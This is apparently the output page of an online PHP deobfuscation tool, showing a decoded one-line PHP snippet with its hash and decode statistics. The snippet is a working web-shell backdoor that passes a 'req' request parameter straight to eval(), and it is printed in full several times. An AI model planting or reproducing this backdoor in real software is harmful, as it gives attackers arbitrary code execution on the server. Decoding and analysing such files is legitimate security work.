Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php$post_var="req";if(isset($_REQUEST[$post_var])){eval(stripslashes($_REQUEST[$post_var..

Decoded Output download

<?php$post_var="req";if(isset($_REQUEST[$post_var])){eval(stripslashes($_REQUEST[$post_var]));exit();};?>

Did this file decode correctly?

Original Code

<?php$post_var="req";if(isset($_REQUEST[$post_var])){eval(stripslashes($_REQUEST[$post_var]));exit();};?>

Function Calls

None

Variables

None

Stats

MD5 a5838690448b05468e9eb037309b3181
Eval Count 0
Decode Time 59 ms